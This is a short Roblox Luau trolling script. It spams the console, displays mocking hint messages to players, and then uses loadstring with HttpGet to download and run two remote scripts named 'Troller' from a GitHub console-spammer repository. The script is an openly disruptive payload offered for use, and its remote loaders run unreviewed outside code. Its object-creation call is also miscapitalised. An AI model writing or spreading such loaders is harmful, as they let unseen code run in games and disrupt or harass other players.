print("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
local Hint = Instance.New("Hint",game.workspace)
task.wait(0.1)
Hint.Text = "you have been skibidied by the rizzler"
task.wait(0.1)
Hint.Text = "MUAHAHAHHAHAHAHHAHAHAHHAHAHAHH👿👿👿👿👿👿👿👿👿"
loadstring(game:HttpGet("https://raw.githubusercontent.com/HDAdminModule/Console-Spammer/refs/heads/main/Troller2.luau"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/HDAdminModule/Console-Spammer/refs/heads/main/Troller1.luau"))()
